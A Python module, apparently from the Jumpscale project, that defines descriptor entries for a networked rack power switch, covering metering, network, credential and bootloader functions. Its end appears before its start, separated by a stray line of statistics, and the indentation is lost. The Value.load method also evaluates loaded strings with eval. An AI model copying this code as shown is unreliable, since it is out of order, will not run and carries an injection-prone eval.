func = Functions()
functions[40013] = func
func.guid = 40013
func.name = "UDPUser"
func.description = "User mode for UDP commands"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[60002] = func
func.guid = 60002
func.name = "BootXTEA"
func.description = "Process a block of encrypted program memory data. The decrypted data will then be written into the program (flash) memory."
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[60004] = func
func.guid = 60004
func.name = "BootErase"
func.description = "Erase a page of program memory. The message takes one parameter, i.e. the page number. Valid page number for the dsPICFJ256 are from 16 to 170."
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[60005] = func
func.guid = 60005
func.name = "BootPageRange"
func.description = (
"To get the number of pages of the application firmware memory. Only pages within this range can be erased."
)
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[60010] = func
func.guid = 60010
func.name = "BootParameters"
func.description = "To set or retrieve the parameters of the device stored in flash during production (factory mode) such as: - Application firmware id (RTF-number) - Application firmware version - Hardware ID (RTH-number) - Hardware version - UID "
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[40010] = func
func.guid = 40010
func.name = "DHCPReset"
func.description = "Reset DHCP"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[14] = func
func.guid = 14
func.name = "CurrentIP"
func.description = "Gives the current IP. When DHCP is on, you can see here what ip is given by the DHCP server"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10067] = func
func.guid = 10067
func.name = "UserLogin"
func.description = "User Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10068] = func
func.guid = 10068
func.name = "UserPassword"
func.description = "User Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10069] = func
func.guid = 10069
func.name = "RestrictedUserLogin"
func.description = "Restricted User Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10070] = func
func.guid = 10070
func.name = "RestrictedUserPassword"
func.description = "Restricted User Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[60020] = func
func.guid = 60020
func.name = "BootAppFwID"
func.description = "Identification of the firmware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[60021] = func
func.guid = 60021
func.name = "BootAppFwVersion"
func.description = "Identification of the hardware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[15] = func
func.guid = 15
func.name = "ApparentPower"
func.description = "Apparent power (this is the product of the current and the voltage)"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "VA"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[16] = func
func.guid = 16
func.name = "PowerFactor"
func.description = "Powerfactor "
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5010] = func
func.guid = 5010
func.name = "MinCurrent"
func.description = "Minimum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5011] = func
func.guid = 5011
func.name = "MinPower"
func.description = "Minimum port power occured since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5012] = func
func.guid = 5012
func.name = "MinPowerFactor"
func.description = "Minimum powerfactor occured per port since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5013] = func
func.guid = 5013
func.name = "MaxPowerFactor"
func.description = "Maximum powerfactor occured per port since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[17] = func
func.guid = 17
func.name = "TotalCurrent"
func.description = "Total current"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[18] = func
func.guid = 18
func.name = "TotalRealPower"
func.description = "Total real power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[19] = func
func.guid = 19
func.name = "TotalApparentPower"
func.description = "Total apparent power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "VA"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[20] = func
func.guid = 20
func.name = "TotalActiveEnergy"
func.description = "Total active energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[21] = func
func.guid = 21
func.name = "TotalApparentEnergy"
func.description = "Total apparent energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[22] = func
func.guid = 22
func.name = "TotalPowerFactor"
func.description = "Total power factor"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5014] = func
func.guid = 5014
func.name = "MinTotalCurrent"
func.description = "Minimum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5015] = func
func.guid = 5015
func.name = "MinTotalPower"
func.description = "Minimum port power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5016] = func
func.guid = 5016
func.name = "MinTotalPowerFactor"
func.description = "Minimum total power factor occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5017] = func
func.guid = 5017
func.name = "MaxTotalPowerFactor"
func.description = "Maximum total power factor occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10071] = func
func.guid = 10071
func.name = "ActiveTotalEnergyReset"
func.description = "Active Total Energy / time of reset + value at that time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10072] = func
func.guid = 10072
func.name = "ApparentTotalEnergyReset"
func.description = "Apparent Total Energy / time of reset + value at that time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[50010] = func
func.guid = 50010
func.name = "MonitorAutoRefresh"
func.description = "Get the monitor values from the module that are auto refreshed"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[40011] = func
func.guid = 40011
func.name = "Role"
func.description = "To see in which role you are logged in"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[40012] = func
func.guid = 40012
func.name = "UserLoginAndPassword"
func.description = "Contains 1 loginname and 1 password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 32
func = Functions()
functions[40014] = func
func.guid = 40014
func.name = "DoHotReset"
func.description = "Hot reset of the device"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
| 21.442897 | 257 | 0.720165 | # pylint: disable=W0201
from Jumpscale import j
JSBASE = j.baseclasses.object
class Value(j.baseclasses.object):
def __init__(self, initStr=None, **kwargs):
JSBASE.__init__(self)
# Initialize everything with None
self.fields = ("type", "size", "length", "unit", "version", "scale", "min", "max")
for field in self.fields:
setattr(self, field, None)
if initStr:
self.load(initStr)
else:
for name, value in kwargs.items():
setattr(self, name, value)
def save(self):
r = ""
for field in self.fields:
val = getattr(self, field)
if val is None:
continue
r += field + "=" + repr(val) + "\n"
return r.strip()
def load(self, _str):
for line in _str.split("\n"):
(key, val) = line.split("=", 1)
setattr(self, key, eval(val))
class Functions(j.baseclasses.object):
# Variables
def __init__(self):
JSBASE.__init__(self)
self.guid = None
self.name = None
self.description = ""
self.valDef = None
self.read = False
self.write = False
self.default = ""
functions = {}
func = Functions()
functions[1] = func
func.guid = 1
func.name = "GeneralModuleStatus"
func.description = "General status of a module"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[2] = func
func.guid = 2
func.name = "SpecificModuleStatus"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[3] = func
func.guid = 3
func.name = "CurrentTime"
func.description = "Unix timestamp of the current time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_TIMESTAMP"
func.valDef.size = 4
func.valDef.unit = "UNIX"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[4] = func
func.guid = 4
func.name = "Voltage"
func.description = "True RMS Voltage"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5] = func
func.guid = 5
func.name = "Frequency"
func.description = "Frequency"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "Hz"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[6] = func
func.guid = 6
func.name = "Current"
func.description = "Current true RMS"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[7] = func
func.guid = 7
func.name = "Power"
func.description = "Real Power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[8] = func
func.guid = 8
func.name = "StatePortCur"
func.description = "current port state"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[9] = func
func.guid = 9
func.name = "ActiveEnergy"
func.description = "Active Energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10] = func
func.guid = 10
func.name = "ApparentEnergy"
func.description = "Apparent Energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[11] = func
func.guid = 11
func.name = "Temperature"
func.description = "Temperature"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[12] = func
func.guid = 12
func.name = "Humidity"
func.description = "Humidity"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[13] = func
func.guid = 13
func.name = "FanSpeed"
func.description = "Fanspeed in Rounds per minute"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "rpm"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5000] = func
func.guid = 5000
func.name = "MaxCurrent"
func.description = "Maximum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5001] = func
func.guid = 5001
func.name = "MaxPower"
func.description = "Maximum port power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5002] = func
func.guid = 5002
func.name = "MaxTotalCurrent"
func.description = "Maximum total current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5003] = func
func.guid = 5003
func.name = "MaxTotalPower"
func.description = "Maximum total power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 8
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[5004] = func
func.guid = 5004
func.name = "MaxVoltage"
func.description = "Maximum voltage occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5005] = func
func.guid = 5005
func.name = "MinVoltage"
func.description = "Minimum voltage occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5006] = func
func.guid = 5006
func.name = "MinTemperature"
func.description = "Minimum temperature occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[5007] = func
func.guid = 5007
func.name = "MaxTemperature"
func.description = "Maximum temperature occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[5008] = func
func.guid = 5008
func.name = "MinHumidity"
func.description = "Minimum humidity occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5009] = func
func.guid = 5009
func.name = "MaxHumidity"
func.description = "Maximum humidity occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10000] = func
func.guid = 10000
func.name = "Address"
func.description = "Identification of the module"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10001] = func
func.guid = 10001
func.name = "ModuleName"
func.description = "Module name"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10002] = func
func.guid = 10002
func.name = "FirmwareVersion"
func.description = "Firmware version"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[10003] = func
func.guid = 10003
func.name = "HardwareVersion"
func.description = "Hardware version"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[10004] = func
func.guid = 10004
func.name = "FirmwareID"
func.description = "Identification of the firmware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[10005] = func
func.guid = 10005
func.name = "HardwareID"
func.description = "Identification of the hardware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[10006] = func
func.guid = 10006
func.name = "RackName"
func.description = "Rack Name"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10007] = func
func.guid = 10007
func.name = "RackPosition"
func.description = "Position of the Energy Switch in the rack"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10008] = func
func.guid = 10008
func.name = "AdminLogin"
func.description = "Admin Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10009] = func
func.guid = 10009
func.name = "AdminPassword"
func.description = "Admin Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10010] = func
func.guid = 10010
func.name = "TemperatureUnitSelector"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10011] = func
func.guid = 10011
func.name = "IPAddress"
func.description = "IP-address"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10012] = func
func.guid = 10012
func.name = "SubNetMask"
func.description = "Subnetmask"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SUBNETMASK"
func.valDef.size = 4
func = Functions()
functions[10013] = func
func.guid = 10013
func.name = "StdGateWay"
func.description = "Standard gateway IP"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10014] = func
func.guid = 10014
func.name = "DnsServer"
func.description = "Dns server IP"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10015] = func
func.guid = 10015
func.name = "MAC"
func.description = "MAC address"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_MAC"
func.valDef.size = 6
func = Functions()
functions[10016] = func
func.guid = 10016
func.name = "DHCPEnable"
func.description = "DHCP enable"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10017] = func
func.guid = 10017
func.name = "NTPServer"
func.description = "NTP server IP"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10018] = func
func.guid = 10018
func.name = "UseDefaultNTPServer"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10019] = func
func.guid = 10019
func.name = "UseNTP"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10020] = func
func.guid = 10020
func.name = "SNMPTrapRecvIP"
func.description = "SNMP trap server IP-address"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10021] = func
func.guid = 10021
func.name = "SNMPTrapRecvPort"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10022] = func
func.guid = 10022
func.name = "SNMPCommunityRead"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10023] = func
func.guid = 10023
func.name = "SNMPCommunityWrite"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10024] = func
func.guid = 10024
func.name = "SNMPControl"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10025] = func
func.guid = 10025
func.name = "TelnetCLIPort"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10026] = func
func.guid = 10026
func.name = "TelnetUARTMUXPort"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10027] = func
func.guid = 10027
func.name = "SelectUARTMUCChannel"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10028] = func
func.guid = 10028
func.name = "LDAPServer"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10029] = func
func.guid = 10029
func.name = "UseLDAPServer"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10030] = func
func.guid = 10030
func.name = "Beeper"
func.description = "Beeper control enable beeper for n seconds"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "s"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10031] = func
func.guid = 10031
func.name = "DisplayLock"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10032] = func
func.guid = 10032
func.name = "DisplayTimeOn"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "min"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10033] = func
func.guid = 10033
func.name = "DisplayRotation"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10034] = func
func.guid = 10034
func.name = "PortName"
func.description = "Name of the port"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10035] = func
func.guid = 10035
func.name = "PortState"
func.description = (
"The state of the port, only used to set the port state, see current port state to get the port state"
)
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10036] = func
func.guid = 10036
func.name = "CurrentPriorOff"
func.description = "Priority level switch off when maximum total current exceeds threshold"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "1H8L"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10037] = func
func.guid = 10037
func.name = "DelayOn"
func.description = "Port activation delay after power recycle"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "s"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10038] = func
func.guid = 10038
func.name = "MaxCurrentOff"
func.description = "Maximum port current switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10039] = func
func.guid = 10039
func.name = "MaxCurrentWarning"
func.description = "Maximum port current warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10040] = func
func.guid = 10040
func.name = "MaxPowerOff"
func.description = "Maximum port power switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10041] = func
func.guid = 10041
func.name = "MaxPowerWarning"
func.description = "Maximum port power warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10042] = func
func.guid = 10042
func.name = "MaxTotalCurrentOff"
func.description = "Maximum total current switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
